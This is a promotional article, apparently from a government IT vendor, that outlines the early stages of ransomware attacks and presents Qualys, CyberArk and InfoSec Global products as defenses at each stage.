Understanding and Preventing Early Stages of Ransomware Attacks

Ransomware has steadily evolved into arguably the most critical and immediate cybersecurity threat afflicting both the public and private sectors, with a new organization suffering a ransomware attack every 14 seconds (Astra). Prominent Ransomware-as-a-Service (RaaS) variants such as RansomHub are increasingly being utilized by cybercriminals and nation state threat actors to encrypt and exfiltrate sensitive data as leverage for ransom payment. These attacks employ advanced tactics, techniques, and procedures (TTPs) such as double-extortion, self-replicating malware, and AI-driven social engineering to evade detection and increase attack efficacy. To effectively protect mission-critical data, understanding and preventing ransomware at its earliest stages is critical. Implementing advanced and integrated cybersecurity solutions for identity security, cryptographic and vulnerability management, and data resiliency and recovery empowers federal agencies to significantly reduce their vulnerability to ransomware attacks and mitigate potential risks before it is too late.  

Stage 1: Reconnaissance (Pre-Attack Phase)

During reconnaissance, attackers gather information to identify potential vulnerabilities. Techniques include Open-Source Intelligence (OSINT), phishing email lures, vulnerability scanning, and external DNS and WHOIS enumeration.

• Qualys continuously maps and monitors your external attack surface, pinpointing and prioritizing vulnerabilities that appear on KEV lists or are known ransomware attack vectors. Automated and comprehensive scanning not only uncovers exposures but deploys compensating security controls for critical, newly discovered weaknesses before an official patch is available. Qualys also maintains a real-time inventory of vulnerabilities that are patched vs. unpatched, giving accurate visibility and ensuring your agency stays ahead of ransomware attacks.
• InfoSec Global Federal automates cryptographic posture management by scanning all cryptographic objects across the agency to detect weak, foreign, or malicious algorithms that may serve as threat vectors for ransomware attacks.

Stage 2: Initial Access (Day 0 – Compromise)

Attackers typically achieve initial access to the target network through phishing emails with malicious attachments or links, exploitation of public-facing applications (CVE exploits), credential stuffing (using leaked credentials), exploiting unpatched software (such as EternalBlue), and supply chain compromises.

• Qualys VMDR detects CISA KEVs (Known Exploitable Vulnerabilities) and other exploitable CVEs and can automate the deployment of patches to remediate these vulnerabilities.
• CyberArk prevents ransomware execution by provisioning and securing access credentials against stuffing attacks, employing robust identity security solutions like EPM (Endpoint Privilege Management) and PAM (Privileged Access Management) that safeguard mission-critical assets from unauthorized access.
  • EPM controls privileges and restricts unknown executables to reduce the potential of zero-day ransomware attacks.
  • EPM has been tested by Merlin Labs against 3+ million ransomware strains with 100% prevention efficacy.

Stage 3: Execution (Day 1 – Establishing Presence)

Upon gaining initial access, attackers launch malicious payloads, utilizing techniques such as PowerShell execution, scheduled tasks/jobs, windows management instrumentation (WMI) exploitation, and dynamic link library (DLL) side-loading.

• CyberArk EPM blocks PowerShell-based attacks, execution of malicious scripts, and command bypass techniques used to steal access credentials.
• Qualys enhances detection capabilities by identifying anomalous behaviors indicative of malicious payload execution, ensuring prompt response to threats and effective risk mitigation.

Stage 4: Persistence (Day 2 – Maintaining Access)

Threat actors ensure continued access through methods like creating registry run keys, establishing new services, scheduling malicious tasks, and installing backdoors.

• CyberArk proactively mitigates persistent access by layering PAM with EPM’s active detection and automated response. CyberArk not only restricts unauthorized execution of tasks and secures backdoors but also deploys decoy “lure” credentials, monitoring their use across your environment, and enforcing just-in-time local admin privileges to limit standing access.
• Qualys EDR runs on the same agent used for vulnerability scanning, detecting unauthorized registry run keys, new services, scheduled tasks, or backdoor implants, and automatically triggers containment and remediation.
• InfoSec Global Federal continuously monitors all cryptographic keys, ensuring that any malicious keys created by threat actors are identified and remediated as they emerge.

The preliminary stages of ransomware attacks present critical opportunities to detect and disrupt potential threats before cyber adversaries compromise mission-critical data. With ransomware impacting 59% of organizations in 2024 (Sophos), early-stage prevention is imperative to protect your agency’s mission. Integrating solutions from CyberArk, Qualys, and InfoSec Global offers both preventative and detective controls to proactively defend, detect, prevent, and mitigate ransomware attacks at their inception, significantly enhancing your agency’s cybersecurity resilience.